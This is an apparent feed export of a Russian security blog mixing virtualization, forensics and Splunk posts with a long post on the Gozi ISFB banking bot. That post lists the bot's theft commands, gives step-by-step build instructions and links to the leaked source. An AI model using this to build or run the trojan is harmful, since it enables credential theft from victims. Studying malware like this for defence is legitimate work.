-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----
If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)</pre>
</div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-33630718670254978152016-04-20T11:25:00.002+03:002016-04-20T11:25:27.595+03:00Ransomware [Database]<div dir="ltr" style="text-align: left;" trbidi="on">
"База данных" известных криптолокеров, а так же помощь в расшифровке файлов.<div>
<br /><div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4_t-5V6nBjmQxVh0Mwbwtt4HE9E5Fews3cHUN-E3jUgHGdSJSE8r8mhR9k-dM90VKtEBQ1hCP59McBENwvonezstl9y_KpwmLVV8lNiJyP5-UELD2W3HZJS_ail1jDHmJr6nmYiXCM5k/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4_t-5V6nBjmQxVh0Mwbwtt4HE9E5Fews3cHUN-E3jUgHGdSJSE8r8mhR9k-dM90VKtEBQ1hCP59McBENwvonezstl9y_KpwmLVV8lNiJyP5-UELD2W3HZJS_ail1jDHmJr6nmYiXCM5k/s640/11.png" width="640" /></a></div>
<div>
<br /><div>
<div style="text-align: center;">
<a href="https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/edit#gid=0"><span style="font-size: large;">docs.google.com</span></a></div>
<div style="text-align: center;">
<b>названия --- расширения --- паттерны --- декрипторы</b></div>
</div>
</div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-32460938523373261442016-04-20T11:15:00.001+03:002016-04-20T11:42:42.203+03:00"Инструменты" виртуализации. Полезные инструменты. [заметка]<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<b style="font-size: x-large;">Управление виртуализацией</b></div>
<ul style="text-align: left;">
<li><a href="http://www.novell.com/products/migrate/">Migrate:</a> инструмент для миграции в виртуальную среду</li>
<li><a href="http://www.openfiler.com/">OpenFiler:</a> создание сетевого файлового хранилища с управлением через веб-интерфейс</li>
<li><a href="http://www.starwindsoftware.com/starwind">StarWind Virtual SAN:</a> виртуализированное хранилище, ориентированное на работу с гипервизорами</li>
<li><a href="http://www.vmware.com/products/converter/">vCenter Converter:</a> позволяет конвертировать физическую машину под Windows и Linux в виртуальную</li>
<li><a href="http://www.robware.net/">RV Tools:</a> приложение, использующее ВИ SDK для отображения информации о виртуальных машинах и ESX-хостах</li>
<li><a href="http://www.citrix.com/English/ps2/products/feature.asp?contentID=1687093">Citrix Essentials:</a> управление хост-серверами XenServer и Hyper-V для обеспечения виртуализации корпоративного уровня</li>
<li><a href="http://www.veeam.com/vmware-esx-backup.html">Veeam Backup and Replication:</a> восстановление виртуализированных приложений и данных платформ vSphere и Hyper-V</li>
<li><a href="http://labs.vmware.com/flings/vcma">vSphere Mobile Watchlist:</a> позволяет мониторить виртуальную инфраструктуру удаленно с помощью смартфона</li>
<li><a href="http://www.vmware.com/appliances/directory/va/89313">ESX Deployment Appliance:</a> упрощает развертку ESX-серверов</li>
<li><a href="https://code.google.com/p/ganeti/">Ganeti:</a> система управления кластером виртуализации от компании Google</li>
<li><a href="http://www.ovirt.org/">oVirt:</a> платформа виртуализации с простым веб-интерфейсом</li>
<li><a href="http://www.packer.io/">Packer:</a> инструмент для сборки образов</li>
<li><a href="http://www.xenproject.org/">Xen:</a> монитор виртуальных машин или гипервизор с поддержкой паравиртуализации для процессоров архитектуры x86</li>
<li><a href="http://cloudstack.org/">CloudStack:</a> позволяет автоматизировать развертывание, настройку и поддержание виртуальной инфраструктуры</li>
<li><a href="http://www.vagrantup.com/">Vagrant:</a> консольная утилита для создания и конфигурирования виртуальной среды разработки</li>
<li><a href="https://www.virtualbox.org/">VirtualBox:</a> легкий и надежный инструмент виртуализации</li>
<li><a href="http://e.huawei.com/en/products/cloud-computing-dc/cloud-computing/fusionsphere/fusionsphere">FusionSphere:</a> платформа виртуализации от Huawei</li>
</ul>
<div>
<img src="http://www.vmstart.ru/images/stories/virt_serv/vmware24.png" height="276" style="text-align: center;" width="640" /></div>
<div>
<a name='more'></a><br /></div>
<span style="font-size: large;"><b>KVM</b></span><br />
<ul style="text-align: left;">
<li><a href="http://www.linux-kvm.org/page/Main_Page">KVM:</a> решение по виртуализации в среде Linux для процессоров архитектуры x86</li>
<li><a href="https://mist.io/">Mist.io:</a> комплексное решение, помогающее управлять гибридной инфраструктурой</li>
<li><a href="https://github.com/ChoHag/nbsvm">nbsvm:</a> создание, работа и взаимодействие с ВМ с помощью простых цепочечных команд</li>
<li><a href="http://witsbits.com/">Witsbits:</a> сервис, упрощающий развертку виртуальных машин на физических серверах</li>
<li><a href="https://www.univention.com/products/ucs/functions/virtualization-uvmm/">UVMM:</a> интуитивно понятное управление виртуальными машинами на базе Xen и KVM</li>
<li><a href="http://libvirt.org/">libvirt:</a> кроссплатформенная библиотека для управления виртуализацией</li>
<li><a href="http://clownix.net/">cloonix:</a> настройка параметров виртуальной сети</li>
<li><a href="http://archipelproject.org/">Archipel:</a> push-уведомления с использованием XMPP</li>
<li><a href="https://github.com/kimchi-project/kimchi">kimchi:</a> инструмент управления для KVM на базе HTML5</li>
<li><a href="http://www.solusvm.com/">SolusVM:</a> одна из самых популярных контрольных панелей для коммерческого использования</li>
<li><a href="http://virt-manager.org/">Virtual Machine Manager:</a> предоставляет интерфейс для управления виртуальными машинами с помощью libvirt</li>
<li><a href="https://github.com/mzch/vmmaestro">vmmaestro:</a> небольшой shell-скрипт, способный запускать и останавливать виртуальные машины на базе KVM</li>
<li><a href="http://codewreck.org/kvm-wrapper">kvm-wrapper:</a> набор shell-скриптов, упрощающих управление виртуальными машинами на базе KVM</li>
</ul>
<span style="font-size: large;"><b>Безопасность виртуальных сред</b></span><br />
<ul style="text-align: left;">
<li><a href="http://www.vmware.com/">VMware vShield Edge:</a> продукт для комплексной защиты периметра дата-центра</li>
<li><a href="http://www.vmware.com/">VMware Compliance Checker Tool:</a> проверки на соответствие требованиям безопасности (FISMA, PCI/DSS и др.)</li>
<li><a href="http://www2.catbird.com/">Catbird Secure:</a> решение по безопасности для физических и виртуальных инфраструктур</li>
<li><a href="http://www.hytrust.com/">HyTrust:</a> средство защиты соединений пользователей в виртуальной инфраструктуре</li>
<li><a href="http://us.trendmicro.com/">Trend Micro:</a> платформа для защиты физических, виртуальных и облачных серверов</li>
</ul>
P.S. Другие материалы из нашего блога на Хабре о разработке провайдера виртуальной инфраструктуры <a href="https://1cloud.ru/">1cloud</a>:<br />
<br />
<a href="https://habrahabr.ru/company/1cloud/blog/281889/">Как создать провайдера виртуальной инфраструктуры: Опыт 1cloud</a><br />
<a href="https://habrahabr.ru/company/1cloud/blog/280748/">Клиентоориентированное «облако»: Опыт 1cloud</a><br />
<a href="https://habrahabr.ru/company/1cloud/blog/278479/">Фотоэкскурсия по «облаку» компании 1cloud</a><br />
<a href="https://habrahabr.ru/company/1cloud/blog/278055/">Немного о хранении данных и опыте 1cloud</a><br />
<a href="https://habrahabr.ru/company/1cloud/blog/277155/">Оптимизация UI: Опыт 1cloud</a><br />
<div>
<br /></div>
<div>
Оригинал статьи:</div>
<div style="text-align: center;">
<a href="https://habrahabr.ru/company/1cloud/blog/281941/">https://habrahabr.ru/company/1cloud/blog/281941/</a></div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-22131689395471457552016-04-18T12:36:00.001+03:002016-04-18T12:36:27.985+03:00Бот Gozi ISFB (a.k.a Ursnif)<div dir="ltr" style="text-align: left;" trbidi="on">
ISFB - программа-бот предназначенная для анализа и модификации HTTP траффика на компьютере клиента. <ul style="text-align: left;">
<li>Поддерживает все 32х и 64х битные Windows, начиная с Windows XP. </li>
<li>Поддерживает все 32х и 64х битные версии Internet Explorer, начиная с 6.0. </li>
<li>Поддерживает все 32х и 64х битные версии Mozilla Firefox. </li>
<li>Поддерживает все 32х битные версии Google Chrome. </li>
</ul>
Программа способна устанавливаться и работать без привелегий администратора. <br />Обрабатывает весь HTTP траффик браузера в том числе и шифрованый HTTPS. <br />Бот управляется с удаленного сервера, с помощью файлов конфигурации и команд. <br />Файлы конфигурации и команд подписываются посредством RSA. При получении файлов, бот проверяет цифровую подпись, и, в случае несоответвия подписи, файл игнорируется. <br /><br /><a href="https://habrahabr.ru/company/eset/blog/281787/">https://habrahabr.ru/company/eset/blog/281787/</a><div>
<a href="https://habrahabr.ru/company/group-ib/blog/250627/">https://habrahabr.ru/company/group-ib/blog/250627/</a><br /><div>
<a href="https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb">https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb</a></div>
<div>
<a href="https://github.com/defure/ISFB">https://github.com/defure/ISFB</a></div>
<div>
<a href="https://mega.nz/#!oIEjmDYI!7UF6Zc8km3yNZtWBtu-Jr1R7PWVNdLYB_YdFP8vTKm8">https://mega.nz/#!oIEjmDYI!7UF6Zc8km3yNZtWBtu-Jr1R7PWVNdLYB_YdFP8vTKm8</a><br /> <a name='more'></a><br />При первом запуске бот инициирует таймер. В дальнейшем, по таймеру, бот обращается на управляющий сервер за файлами. <br />Поддерживается 2 способа поиска управляющего сервера: <br /><br />- перебор заданного списка доменных имен и выбор активного; <br /><br />- генерациия динамического списка доменных имен в зависимости от текущей даты и конфигурации системы; <br /><br />Анализ траффика производится на основе специально сформированного файла конфигурации, который бот получает с сервера. <br />Такой файл может содержать следующие инструкции: <br /><br />- подмена HTML страницы целиком <br /><br />- замена фрагмента HTML страницы <br /><br />- скопировать фрагмент страницы и отправить на сервер <br /><br />- найти файл по маске и оправить на сервер <br /><br />- сделать скриншот экрана и отправить на сервер <br /><br /> <br /><br />Кроме файла конфигурации бот получает с сервера команды: <br /><br />GET_CERTS - экспортировать и выслать сертификаты, установленные в системном хранилище Windows. Для XP выгружает, также, неэкспортируемые сертификаты. <br /><br />GET_COOKIES - собрать cookie FF и IE, SOL-файлы Flash, упаковать их с сохранением структуры каталогов и выслать на сервер. <br /><br />CLR_COOKIES - удалить cookie FF и IE, SOL-файлы Flash. <br /><br />GET_SYSINFO - собрать системную информацию: тип процессора, версию ОС, список процессов, список драйверов, список установленных программ. <br /><br />KILL - убить ОС (работает только с правами администратора) <br /><br />REBOOT - перезагрузить ОС <br /><br />GROUP=n - сменить ID группы бота на n <br /><br />LOAD_EXE=URL - загрузить файл с указанного URL и запустить его <br /><br />LOAD_REG_EXE=URL- загрузить файл с указанного URL, зарегистрировать его в autirun и запустить <br /><br />LOAD_UPDATE=URL - загрузить апдейт программы и запустить <br /><br />GET_LOG - отправить внутренний лог на сервер <br /><br />GET_FILES=* - найти все файлы, соответствующие заданной маске, и отправить на сервер <br /><br />SLEEP=n - остановить обработку очереди команд на n миллисекунд. (используется при долгих операциях) <br /><br />SEND_ALL - отправить все данные из очереди на отправку немедленно. В противном случае, данные оправляются по таймеру. <br /><br />LOAD_DLL=URL[,URL] - загрузить по указанному URL DLL и инжектить её в процесс explorer.exe. первый URL для 32х-битной DLL, второй - для 64х-битной. <br /><br />SOCKS_START=IP:PORT - запустить сокс4\5 сервер (при его наличии) <br /><br />SOCKS_STOP - остановить сокс4\5 сервер <br /><br />GET_KEYLOG - отправить данные кейлоггера (при его наличии) <br /><br />GET_MAIL - активировать граббер E-Mail (при наличии) и отправить, полученные от него, данные <br /><br /><div>
GET_FTP - активировать граббер FTP (при наличии) и отправить, полученные от него, данные <br /><br />SELF_DELETE - удалить софт из системы, включая все файлы и ключи реестра <br /><br />URL_BLOCK=URL - заблокировать доступ ко всем URL удовлетворяющим заданной маске <br /><br />URL_UNBLOCK=URL - разблокировать доступ к URL, удовлетворяющим заданной маске, ранее заблокированным командой URL_BLOCK <br /><br />FORMS_ON - включить граббер HTTP форм (если есть дефайн _ALWAYS_HTTPS, то граббер HTTPs остаётся включен всегда) <br /><br />FORMS_OFF - отключить граббер HTTP форм <br /><br />KEYLOG_ON[= list] - включить кейлог, для заданного списка процессов <br /><br />KEYLOG_OFF - отключить кейлог <br /><br />LOAD_INI=URL - загрузить упакованный INI-файл с указанного URL, сохранить его в рееестре и использовать вместо INI-файла, прикреплённого к софту с помощью билдера. INI-файл должен быть упакован и подписан. <br /><br />LOAD_REG_DLL = name, URL[,URL] - загрузить DLL по указанному URL, сохранить её под заданным именем и зарегистрировать для автоматической загрузки после каждого запуска системы <br /></div>
<div>
UNREG_DLL = name - удалить из автоматической загрузки DLL c заданным именем <br /><br /> <br /><br />Технические детали <br /><br />Дропер - программа установки. <br />Дропер представляет собой исполняемый файл Windows (PE32). В файле, в виде бинарного ресурса, содержятся две упакованые DLL: 32х битный и 64х-битный бот. При старте дропер распаковывает DLL и регистрирует их для автозапуска. DLL распаковываются и регистрируются таким образом, чтобы иметь возможность выполняться при любом уровне привелегий: <br />как при администраторе, так и при пользователе. </div>
<div>
<br /> <br /><br />DLL - бот. <br />Бот представляет собой динамически загружаемую библиотеку (DLL). Для каждой архитектуры собирается своя, соответствующаяя DLL. <br /><br />DLL-бот загружается во все запускаемые процессы. <br />Бот состоит из 2х логических компонентов: парсер и сервер. Парсер активируется в контексте процесса-браузера. Сервер активируется в контексте процесса оболочки (как правило explorer.exe). <br /><br />Парсер выполняет следующие функции: <br /><br />- отправка/получение данных (получение команд, конфигов; отправка форм, файлов) <br /><br />- непосредственный перехват, анализ, и модификация HTTP траффика <br /><br /> <br />Сервер (в контексте explorer.exe) выполняет: <br /><br />- файловые операции (поиск, создание и удаление файлов) <br /><br />- запуск программ, обновление <br /><br />- системные функции (перезагрузка, блокировка ОС) <br /><br /> <br />Таким образом, все операции, требующие привелегий, выполняются сервером в контексте explorer.exe, а все операции с сетью исключительно из браузера. <br /><br />Сборка и настройка </div>
<div>
<br />Проект собирается при помощи Microsoft Visual Studio 2005, либо более поздней версии. <br />В проект интегрирован криптор, который используется по-умолчанию. <br />В результате сборки и криптовки получаются следующие файлы: <br /><br />Release\crm_p.exe <br />Release\client_p.dll <br />x64\Release\client_p.dll <br /><br />это упакованные и криптованые версии бота и дропера, причем дропер (файл crm_p.exe) содержит в себе два других. <br /><br />Некриптованные версии бота лежат там же: <br /><br />Release\crm.exe <br />Release\client.dll <br />x64\Release\client.dll <br /><br />Кроме бота, проект включает в себя:<br />Release\dname.exe - утилита для генерации псевдо-случайных доменных имен; <br />Release\rsakey.exe - утилита для подписывания файлов команд и конфига; <br />config.exe - программа конфигуратор. <br /><br />Основные настройки программы находятся в файлах id.h и config.h. <br />id.h содержит номер группы бота. config.h содержит такие параметры как: список управляющих серверов, названия URL-ов для получения команд и конфигов, и для отсылки данных, а также различные ключи и параметры влияющие на настройку программы. <br /><br /> <br />Сборка с билдером <br />Существует возможность собрать ISFB так, чтобы в дальнейшем прикреплять к DLL ключи и файлы настроек, не пересобирая проект. <br /><br />1. Собрать ISFB в конфигурации Release(Builder) под x86 и x64. <br /><br />2. Отредактировать файлы: \public.key и \client.ini, содержащие RSA-ключ и настройки программы соответственно. <br /><br />3. В консольном окне выполнить build.bat из папки \Builder <br /><br />4. Забрать готовый installer.exe из папки \Builder\Release <br /><br /> <br /><br />Батник build.bat запускает билдер, который прикрепляет к каджой DLL (для х86 и х64) файлы: public.key и client.ini. </div>
<div>
<br /></div>
<div>
В последствии обе DLL прикрепляются к инсталлеру. <br />Готовый инсталлер сохраняется в файл \Release\install.exe <br /><br />Сборка с BK <br />Существует возможность собрать ISFB вместе BK в один исполняемый файл-установщик, так, чтобы в случае ошибки при установке BK, устанофщик извлекал DLL и устанавливал их отдельно. <br /><br />Примечание: папка, содержащая солюшен с BK2 должена находиться в той же директории, что и папка, содержащая ISFB. <br /><br />1. Собрать BK в конфигурации Release под х86 и х64. <br /><br />2. Собрать ISFB в конфигурации Release(Builder) под x86 и x64. <br /><br />3. Отредактировать файлы: \public.key и \client.ini. <br /><br />4. В консольном окне запустить bkbuild.bat из папки \Builder <br /><br />5. Забрать собраный bksetup.exe, содержащий BK, ISFB-DLL и ISFB-инсталлер, из \Builder\Release <br /><br /><br />Работа в режиме инжекта из памяти <br /><br />Для работы в режиме инжекта из памяти необходимо установить значение флага _INJECT_AS_IMAGE в файле \common\main.h в <br /><br /> TRUE, и пересобрать проект. В этом случае инсталлер не создает DLL на диске, а копирует себя в одну из системных папок и регистрируется в Windows AutoRun. <br /><br />При запуске инсталлер инжектит образ DLL, соответствующей архитектуры, в Explorer.exe, откуда, в свою очередь, сооответствующий образ DLL инектится во все пораждаемые процессы, разных архитектур. <br /><br />Плагины <br />ISFB поддерживает плагины: специально собраные, DLL, экпортирующие функцию PluginRegisterCallbacks и вызывающие внутренние функции софта (например, функции отправки данных). <br /><br />Для загрузки плагина используется команда: <br /><br /> LOAD_PLUGIN=URL[,URL] - где первый URL для 32х-битной версии DLL, второй - 64x-битной. <br /><br />Софт скачивает DLL соответствующей архитектуры и инжектит её в explorer.exe, затем вызывается функция <br /><br /> PluginRegisterCallbacks, в которую передаётся указатель на список коллбэков (функций), реализованых внутри софта, которые может использовать плагин. <br /><br />Описание структур и прототипов функций для создания плагинов находится в файле \common\plugin.h <br /><br />Состав проекта <br /><br />\AcDLL - библиотека инжектов. Реализует механизм инжекта DLL во все пораждаемые процессы, независимо от архитектуры. <br /><br /> Поддерживает два режима работы: инжект, непосредственно DLL и инжект образа DLL из памяти без создания файла на диске. <br /><br />\ApDepack - библиотека на основе APLIB, релизующая функции распаковки. <br /><br />\BcClient - библиотека клиента для бэкконект сервера. <br /><br />\Client - основная DLL приложения <br /><br />\Common - библоиотека, реализующая общие функции, используемые в разных частях проекта. Такие как: чтение файлов, ключей реестра, операции с потоками данных, со строками, с XML, хуки и т.п. <br /><br />\Crypto - библиотека криптографических функций. Реализует следующие алгоритмы: CRC32, BASE64, MD5, RSA, RC6, AES, DES, SHA1. <br /><br /> Используется для подписи конфиг-файлов и файлов команд, а также, для саршифровки информации e-mail и ftp аккаунтов. <br /><br />\Dname - программа генерации доменных имён на основе номера группы софта и текущей даты. <br /><br />\Ftp - библиотека FTP-грабберов. <br /><br />\Handle - библиотека, реализующая хэш таблицу. Используется для привязки хэндлов HTTP запросов к внутреннему контексту ISFB. Также, используется кейлоггером, для группировки клавиатурных логов по PID-ам и HWND. <br /><br />\IM - DLL-плагин, реализующая граббер Instant Messangers. <br /><br />\Install - программа-установщик ISFB. <br /><br />\KeyLog - библиотека кейлоггер. <br /><br />\Mail - библиотека E-mail грабберов. <br /><br />\RsaKey - программа для шифрования и цифровой подписи конфиг-файлов и файлов команд. <br /><br />\SocksLib - библиотека, реализующая SOCKS4\5-сервер. <br /><br />\Sqlite3 - библиотека для работы с БД SQLLite. Используется IM-грабберами. <br /><br />\ZConv - программа-конвертер конфигов Zeus в конфиг-файлы ISFB. <br /><br /> </div>
</div>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-24949722173925880382016-04-14T13:37:00.001+03:002016-04-14T13:37:29.284+03:00Графический интерфейс для volatility [GUI for Volatility Framework] <div dir="ltr" style="text-align: left;" trbidi="on">
Недавно обновился VolUtility - web-бейс интерфейс для известного инструмента форенсики.<br />
<div style="text-align: center;">
<a href="https://techanarchy.net/2016/04/volutility-a-web-front-end-for-the-volatility-framework/"><span style="font-size: x-small;">https://techanarchy.net/2016/04/volutility-a-web-front-end-for-the-volatility-framework/</span></a></div>
<div style="text-align: center;">
<img height="244" src="http://static1.1.sqspcdn.com/static/f/830757/24004191/1386104334313/v.png?token=AIvEJFBgNaLJDPDRxGPzAE0hLvg%3D" width="320" /></div>
После установки Centos7 на варю, использовал скрипт с гита разработчика, который позволяет автоматизировать установку. (VolUtility + Volatility Framework)<br />
<a href="https://raw.githubusercontent.com/kevthehermit/VolUtility/master/centos_7_bootstrap.sh">https://raw.githubusercontent.com/kevthehermit/VolUtility/master/centos_7_bootstrap.sh</a><br />
<br />
Стартуем:<br />
cd /opt/tools/VolUtility/<br />
./manage.py runserver 0.0.0.0:8000<br />
<br />
Очень приятный ифейс, для выполнение рутинных задач. Полный гайд по нему, есть по ссылке выше(видео)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZNpnXI6DTAl0zn7tXxMXmRaKS6qoFukpoywbW3eLenqZr9CSwplvTAc3sCT1FuJBVA3fwbs5ZKc-2YESLpDXbv-mjYM-QEAff0XhD5OSRBYdc8aPvORzmL58yDvFzllxr1z3HjypxTdM/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZNpnXI6DTAl0zn7tXxMXmRaKS6qoFukpoywbW3eLenqZr9CSwplvTAc3sCT1FuJBVA3fwbs5ZKc-2YESLpDXbv-mjYM-QEAff0XhD5OSRBYdc8aPvORzmL58yDvFzllxr1z3HjypxTdM/s640/33.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
После загрузки слепка памяти(в моем случае это седьмая форточка) для анализа:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJyU9hwW95zRSFPQDHbN_mO2N4FWpf6J1alsK44wmw6uy9oaJvnbEXzarSU4ExjdMMongUTYnjQd4n3odyQIZO2rY0wKm02PTqOdyVJj_srejbuNer9KUBMg6vRR92RRbcCPtCXWksxok/s1600/34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJyU9hwW95zRSFPQDHbN_mO2N4FWpf6J1alsK44wmw6uy9oaJvnbEXzarSU4ExjdMMongUTYnjQd4n3odyQIZO2rY0wKm02PTqOdyVJj_srejbuNer9KUBMg6vRR92RRbcCPtCXWksxok/s640/34.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Генерация дерева процессов:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tApFB3TWT3FawYwMHKvx7LkCh-nUowhnXeGvWHYxs_IRml_O9zdt6BOubQLqZTJi2rDhx2tFBjo4mvRzZvkwU1Sk1a52WoWfkeMVOjXjC4OvN8rAY0WWIWEcSKvtZxPaKPFtmf12xiw/s1600/35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2tApFB3TWT3FawYwMHKvx7LkCh-nUowhnXeGvWHYxs_IRml_O9zdt6BOubQLqZTJi2rDhx2tFBjo4mvRzZvkwU1Sk1a52WoWfkeMVOjXjC4OvN8rAY0WWIWEcSKvtZxPaKPFtmf12xiw/s640/35.png" width="640" /></a></div>
Выгрузка артефактов и т.п.<br />
<br /></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-31315599214924061672016-04-14T13:09:00.000+03:002016-04-14T13:09:05.787+03:00Скрипт установки Splunk<div dir="ltr" style="text-align: left;" trbidi="on">
Для автоматического развертывания мониторинга логов в реальном времени. Отладка.<div>
Скрипт взят из репозитория:</div>
<div>
<a href="https://raw.githubusercontent.com/StackGeek/openstackgeek/master/icehouse/openstack_splunk.sh">https://raw.githubusercontent.com/StackGeek/openstackgeek/master/icehouse/openstack_splunk.sh</a></div>
<div>
Развертывание Openstack скрипты:</div>
<div>
<a href="https://github.com/StackGeek/openstackgeek">https://github.com/StackGeek/openstackgeek</a><br /><pre style="word-wrap: break-word;"><span style="color: #333333; font-family: Helvetica Neue, Helvetica, Segoe UI, Arial, freesans, sans-serif, Apple Color Emoji, Segoe UI Emoji, Segoe UI Symbol;"><span style="background-color: white; font-size: 16px; line-height: 25.6px; white-space: normal;"><a name='more'></a>
</span></span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">#!/bin/bash
# Make sure only root can run our script
if [ "$(id -u)" != "0" ]; then
echo "You need to be 'root' dude." 1>&2
exit 1
fi
clear
. ./setuprc
echo;
echo "####################################################################################################
This script is installing and configuring Splunk for ingestion of the OpenStack logs. Splunk can
be used to debug and monitor your OpenStack configuration. Access it from the following URL:
http://$SG_SERVICE_CONTROLLER_IP:8000/
####################################################################################################
"
echo;
# download
wget -O splunk-6.1.3-220630-Linux-x86_64.tgz 'http://www.splunk.com/page/download_track?file=6.1.3/splunk/linux/splunk-6.1.3-220630-Linux-x86_64.tgz&ac=&wget=true&name=wget&platform=Linux&architecture=x86_64&version=6.1.3&product=splunk&typed=release'
# extract, move, cleanup
tar xvfz splunk-6.1.3-220630-Linux-x86_64.tgz
mv splunk /opt/splunk
rm splunk-6.1.3-220630-Linux-x86_64.tgz
# whack on inputs.conf file
echo "
[monitor:///var/log/keystone]
disabled = false
followTail = 0
[monitor:///var/log/nova]
disabled = false
followTail = 0
[monitor:///var/log/glance]
disabled = false
followTail = 0
[monitor:///var/log/cinder]
disabled = false
followTail = 0
[monitor:///var/log/rabbit]
disabled = false
followTail = 0
[monitor:///var/log/mongodb]
disabled = false
followTail = 0
[monitor:///var/log/ceilometer]
disabled = false
followTail = 0
[monitor:///var/log/libvirt]
disabled = false
followTail = 0
" >> /opt/splunk/etc/apps/launcher/default/inputs.conf
# Auto start Splunk on boot
/opt/splunk/bin/splunk enable boot-start
# start splunk
/opt/splunk/bin/splunk start --accept-license
echo;
echo "##########################################################################################"
echo;
echo "Splunk setup complete. Continue the setup by doing a './openstack_mysql.sh'."
echo;
echo "##########################################################################################"
echo;</pre>
</div>
</div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-1142761303143577607.post-63389442784783027102016-04-14T11:19:00.002+03:002016-04-14T11:43:56.528+03:00Обзор, настройка и тестирование Fireeye HX [Configure Fireeye HX +CM+NX] Часть1<div dir="ltr" style="text-align: left;" trbidi="on">
